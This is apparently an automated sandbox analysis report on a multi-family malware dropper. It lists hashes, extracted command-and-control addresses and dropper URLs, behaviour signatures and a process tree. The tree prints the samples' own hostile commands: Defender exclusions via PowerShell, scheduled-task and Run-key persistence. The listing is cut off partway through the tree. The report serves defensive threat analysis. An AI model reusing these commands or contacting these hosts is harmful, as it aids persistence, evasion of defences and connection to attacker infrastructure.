amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Analysis

max time kernel
992s
max time network
1059s
platform
windows10-1703_x64
resource
win10-20231215-en
resource tags

arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
submitted
29-01-2024 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://maxximbrasil.com/themes/config_20.ps1

Extracted

Family

risepro

193.233.132.62:50500

Extracted

Family

xworm

209.145.51.44:7000

Mutex

iLWUbOJf8Atlquud

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

amadey

Version

4.18

http://185.172.128.3

Attributes

install_dir
One_Dragon_Center
install_file
MSI.CentralServer.exe
strings_key
fd2f5851d3165c210396dcbe9930d294
url_paths
/QajE3OBS/index.php

rc4.plain

Extracted

Family

smokeloader

Version

2022

http://vatra.at/tmp/

http://spbdg.ru/tmp/

http://skinndia.com/tmp/

http://cracker.biz/tmp/

http://piratia-life.ru/tmp/

http://piratia.su/tmp/

rc4.i32

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

91.193.75.132:9191

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
true
install_file
images.exe
install_folder
%AppData%

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Fabookie payload 1 IoCs

resource	yara_rule
behavioral2/memory/2452-160-0x0000000002D10000-0x0000000002E3C000-memory.dmp	family_fabookie

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4796-165-0x000001E37B780000-0x000001E37B790000-memory.dmp	family_xworm

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral2/files/0x000700000001ab0c-326.dat	family_zgrat_v1
behavioral2/files/0x000700000001ab0c-329.dat	family_zgrat_v1
behavioral2/files/0x000700000001ab1d-473.dat	family_zgrat_v1
behavioral2/files/0x000600000001ac63-7235.dat	family_zgrat_v1

Fabookie
Fabookie is facebook account info stealer.
spyware stealer fabookie

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4168	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4176	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1868	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4176	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1724	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1980	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3540	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	212	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4668	660	schtasks.exe	97
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3588	660	schtasks.exe	97

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/files/0x000600000001acb3-8238.dat	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/3364-285-0x0000000000400000-0x00000000004D4000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4536 created 2508	4536	brg.exe	15

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ladas.exe

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral2/memory/4936-1482-0x00007FF66B500000-0x00007FF66BCF4000-memory.dmp	xmrig
behavioral2/memory/4936-1721-0x00007FF66B500000-0x00007FF66BCF4000-memory.dmp	xmrig
behavioral2/memory/4936-1798-0x00007FF66B500000-0x00007FF66BCF4000-memory.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x000800000001aac5-127.dat	net_reactor
behavioral2/files/0x000800000001aac5-128.dat	net_reactor
behavioral2/memory/3196-131-0x0000000000820000-0x0000000000D8C000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ladas.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ladas.exe

Executes dropped EXE 19 IoCs

pid	Process
4536	brg.exe
3068	fortnite2.exe
4716	ladas.exe
4448	PCclear_Eng_mini.exe
5024	w-12.exe
1052	T1_Net.exe
4380	ama.exe
404	flt_shovemydiscoupyourarse.exe
4628	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
2452	rty27.exe
3196	hv.exe
816	more.exe
436	asas.exe
2328	payload.exe
4408	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
2264	runtime-bind.exe
4968	visual-c++.exe
3200	v4install.exe
352	setup.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1682406436-2801920780-981986064-1000\Software\Wine	ladas.exe

Loads dropped DLL 1 IoCs

pid	Process
3196	hv.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000600000001ab04-73.dat	upx
behavioral2/memory/5024-74-0x0000000000B00000-0x000000000144B000-memory.dmp	upx
behavioral2/files/0x000600000001ab04-75.dat	upx
behavioral2/memory/5024-112-0x0000000000B00000-0x000000000144B000-memory.dmp	upx
behavioral2/memory/4936-1482-0x00007FF66B500000-0x00007FF66BCF4000-memory.dmp	upx
behavioral2/memory/4936-1721-0x00007FF66B500000-0x00007FF66BCF4000-memory.dmp	upx
behavioral2/memory/4936-1798-0x00007FF66B500000-0x00007FF66BCF4000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
19	raw.githubusercontent.com
440	bitbucket.org
18	raw.githubusercontent.com
140	raw.githubusercontent.com
141	raw.githubusercontent.com
162	bitbucket.org
163	bitbucket.org
368	raw.githubusercontent.com
441	bitbucket.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
85	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000700000001ab53-3282.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
4716	ladas.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3196 set thread context of 3364	3196	hv.exe	109

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\MSI.CentralServer.job	ama.exe

Launches sc.exe 21 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
196	sc.exe
4632	sc.exe
5748	sc.exe
1388	sc.exe
4964	sc.exe
4296	sc.exe
10236	sc.exe
4128	sc.exe
6212	sc.exe
10444	sc.exe
5288	sc.exe
11188	sc.exe
12248	sc.exe
4340	sc.exe
3988	sc.exe
2168	sc.exe
8856	sc.exe
10796	sc.exe
4340	sc.exe
1616	sc.exe
6808	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

pid	pid_target	Process	procid_target
4944	4536	WerFault.exe	74
4352	4628	WerFault.exe	89
4996	3292	WerFault.exe	240
164	3624	WerFault.exe	242
3128	4132	WerFault.exe	235
5500	5068	WerFault.exe	284

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe

Creates scheduled task(s) 1 TTPs 20 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4924	schtasks.exe
1772	schtasks.exe
3588	schtasks.exe
1980	schtasks.exe
3540	schtasks.exe
212	schtasks.exe
4668	schtasks.exe
10076	schtasks.exe
4392	schtasks.exe
3060	schtasks.exe
1724	schtasks.exe
5912	schtasks.exe
304	schtasks.exe
4168	schtasks.exe
1772	schtasks.exe
1108	schtasks.exe
872	schtasks.exe
4176	schtasks.exe
1868	schtasks.exe
4176	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1416	timeout.exe
9668	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1096	WMIC.exe
4924	WMIC.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
6364	taskkill.exe
6244	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}	PCclear_Eng_mini.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024"	PCclear_Eng_mini.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1682406436-2801920780-981986064-1000_Classes\Local Settings	v4install.exe

Runs net.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
1712	PING.EXE
3512	PING.EXE
4976	PING.EXE
432	PING.EXE
5712	PING.EXE
1524	PING.EXE
4908	PING.EXE
4124	PING.EXE
9288	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4536	brg.exe
4536	brg.exe
212	dialer.exe
212	dialer.exe
212	dialer.exe
212	dialer.exe
4716	ladas.exe
4716	ladas.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
4408	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
4408	659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe
4852	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4076	4363463463464363463463463.exe
Token: 33	3152	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3152	AUDIODG.EXE
Token: SeDebugPrivilege	4796	werfault.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	3364	jsc.exe
Token: SeDebugPrivilege	4852	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4448	PCclear_Eng_mini.exe
4448	PCclear_Eng_mini.exe
4628	%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4076 wrote to memory of 4536	4076	4363463463464363463463463.exe	74
PID 4076 wrote to memory of 4536	4076	4363463463464363463463463.exe	74
PID 4076 wrote to memory of 4536	4076	4363463463464363463463463.exe	74
PID 4536 wrote to memory of 212	4536	brg.exe	76
PID 4536 wrote to memory of 212	4536	brg.exe	76
PID 4536 wrote to memory of 212	4536	brg.exe	76
PID 4536 wrote to memory of 212	4536	brg.exe	76
PID 4536 wrote to memory of 212	4536	brg.exe	76
PID 4076 wrote to memory of 3068	4076	4363463463464363463463463.exe	79
PID 4076 wrote to memory of 3068	4076	4363463463464363463463463.exe	79
PID 4076 wrote to memory of 3068	4076	4363463463464363463463463.exe	79
PID 4076 wrote to memory of 4716	4076	4363463463464363463463463.exe	80
PID 4076 wrote to memory of 4716	4076	4363463463464363463463463.exe	80
PID 4076 wrote to memory of 4716	4076	4363463463464363463463463.exe	80
PID 4076 wrote to memory of 4448	4076	4363463463464363463463463.exe	81
PID 4076 wrote to memory of 4448	4076	4363463463464363463463463.exe	81
PID 4076 wrote to memory of 4448	4076	4363463463464363463463463.exe	81
PID 4076 wrote to memory of 5024	4076	4363463463464363463463463.exe	82
PID 4076 wrote to memory of 5024	4076	4363463463464363463463463.exe	82
PID 4076 wrote to memory of 5024	4076	4363463463464363463463463.exe	82
PID 4076 wrote to memory of 1052	4076	4363463463464363463463463.exe	84
PID 4076 wrote to memory of 1052	4076	4363463463464363463463463.exe	84
PID 4076 wrote to memory of 1052	4076	4363463463464363463463463.exe	84
PID 4076 wrote to memory of 4380	4076	4363463463464363463463463.exe	86
PID 4076 wrote to memory of 4380	4076	4363463463464363463463463.exe	86
PID 4076 wrote to memory of 4380	4076	4363463463464363463463463.exe	86
PID 4076 wrote to memory of 404	4076	4363463463464363463463463.exe	87
PID 4076 wrote to memory of 404	4076	4363463463464363463463463.exe	87
PID 4076 wrote to memory of 404	4076	4363463463464363463463463.exe	87
PID 4076 wrote to memory of 4628	4076	4363463463464363463463463.exe	89
PID 4076 wrote to memory of 4628	4076	4363463463464363463463463.exe	89
PID 4076 wrote to memory of 4628	4076	4363463463464363463463463.exe	89
PID 4076 wrote to memory of 2452	4076	4363463463464363463463463.exe	91
PID 4076 wrote to memory of 2452	4076	4363463463464363463463463.exe	91
PID 4076 wrote to memory of 3196	4076	4363463463464363463463463.exe	92
PID 4076 wrote to memory of 3196	4076	4363463463464363463463463.exe	92
PID 4076 wrote to memory of 3196	4076	4363463463464363463463463.exe	92
PID 4076 wrote to memory of 816	4076	4363463463464363463463463.exe	93
PID 4076 wrote to memory of 816	4076	4363463463464363463463463.exe	93
PID 4076 wrote to memory of 816	4076	4363463463464363463463463.exe	93
PID 4076 wrote to memory of 436	4076	4363463463464363463463463.exe	95
PID 4076 wrote to memory of 436	4076	4363463463464363463463463.exe	95
PID 4076 wrote to memory of 2328	4076	4363463463464363463463463.exe	99
PID 4076 wrote to memory of 2328	4076	4363463463464363463463463.exe	99
PID 4076 wrote to memory of 2328	4076	4363463463464363463463463.exe	99
PID 4076 wrote to memory of 4408	4076	4363463463464363463463463.exe	100
PID 4076 wrote to memory of 4408	4076	4363463463464363463463463.exe	100
PID 4076 wrote to memory of 4408	4076	4363463463464363463463463.exe	100
PID 2328 wrote to memory of 2264	2328	payload.exe	101
PID 2328 wrote to memory of 2264	2328	payload.exe	101
PID 2328 wrote to memory of 4968	2328	payload.exe	102
PID 2328 wrote to memory of 4968	2328	payload.exe	102
PID 4076 wrote to memory of 3200	4076	4363463463464363463463463.exe	103
PID 4076 wrote to memory of 3200	4076	4363463463464363463463463.exe	103
PID 4076 wrote to memory of 3200	4076	4363463463464363463463463.exe	103
PID 4076 wrote to memory of 352	4076	4363463463464363463463463.exe	104
PID 4076 wrote to memory of 352	4076	4363463463464363463463463.exe	104
PID 3200 wrote to memory of 4444	3200	v4install.exe	105
PID 3200 wrote to memory of 4444	3200	v4install.exe	105
PID 3200 wrote to memory of 4444	3200	v4install.exe	105
PID 352 wrote to memory of 4460	352	setup.exe	106
PID 352 wrote to memory of 4460	352	setup.exe	106
PID 3196 wrote to memory of 920	3196	hv.exe	108
PID 3196 wrote to memory of 920	3196	hv.exe	108

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2508
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:212
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  PID:368
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  PID:10508

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4076
- C:\Users\Admin\AppData\Local\Temp\Files\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\brg.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4536
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 536
    3⤵
    - Program crash
    PID:4944
- C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fortnite2.exe"
  2⤵
  - Executes dropped EXE
  PID:3068
- C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ladas.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:4716
- C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PCclear_Eng_mini.exe"
  2⤵
  - Executes dropped EXE
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:4448
- C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\w-12.exe"
  2⤵
  - Executes dropped EXE
  PID:5024
- C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\T1_Net.exe"
  2⤵
  - Executes dropped EXE
  PID:1052
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:4380
- C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"
  2⤵
  - Executes dropped EXE
  PID:404
- C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4628
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 604
    3⤵
    - Program crash
    PID:4352
- C:\Users\Admin\AppData\Local\Temp\Files\rty27.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\rty27.exe"
  2⤵
  - Executes dropped EXE
  PID:2452
- C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3196
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    PID:920
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- C:\Users\Admin\AppData\Local\Temp\Files\more.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
  2⤵
  - Executes dropped EXE
  PID:816
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp697E.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:304
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:1868
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:668
- - C:\Users\Admin\AppData\Local\Temp\Files\more.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\more.exe"
    3⤵
    PID:2404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"' & exit
      4⤵
      PID:4320
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "images" /tr '"C:\Users\Admin\AppData\Roaming\images.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:1108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8A54.tmp.bat""
      4⤵
      PID:684
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1416
    - - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        5⤵
        
        PID:4944
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\UiKVWpFsayx.exe"
        6⤵
        
        PID:3140
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UiKVWpFsayx" /XML "C:\Users\Admin\AppData\Local\Temp\tmp399F.tmp"
        6⤵
        Creates scheduled task(s)
        
        PID:872
      - C:\Users\Admin\AppData\Roaming\images.exe
        
        "C:\Users\Admin\AppData\Roaming\images.exe"
        6⤵
        
        PID:3120
- C:\Users\Admin\AppData\Local\Temp\Files\asas.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asas.exe"
  2⤵
  - Executes dropped EXE
  PID:436
- - C:\Windows\System32\werfault.exe
    \??\C:\Windows\System32\werfault.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- C:\Users\Admin\AppData\Local\Temp\Files\payload.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\payload.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2328
- - C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe
    "C:\Users\Admin\AppData\Local\Temp\runtime-bind.exe"
    3⤵
    - Executes dropped EXE
    PID:2264
- - C:\Users\Admin\AppData\Local\Temp\visual-c++.exe
    "C:\Users\Admin\AppData\Local\Temp\visual-c++.exe"
    3⤵
    - Executes dropped EXE
    PID:4968
- C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\659474921cf6a4423645f52a7bf5a9be0e42f41573cb6918d5fdebd66b07e4b2.exe"
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  PID:4408
- C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\v4install.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3200
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\cMC3vG7uf0oG.vbe"
    3⤵
    PID:4444
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\b7te9U2.bat" "
      4⤵
      PID:3136
    - - C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet\agentServerComponent.exe
        
        "C:\Users\Admin\AppData\Roaming\BridgeportWebDllNet/agentServerComponent.exe"
        5⤵
        
        PID:4332
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nddakdxn\nddakdxn.cmdline"
        6⤵
        
        PID:5016
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FD5.tmp" "c:\Windows\System32\CSC31FC732DF8554816982212127893F999.TMP"
        7⤵
        
        PID:4388
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tMbVjmMfS2.bat"
        6⤵
        
        PID:212
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4668
        
        C:\Windows\system32\PING.EXE
        
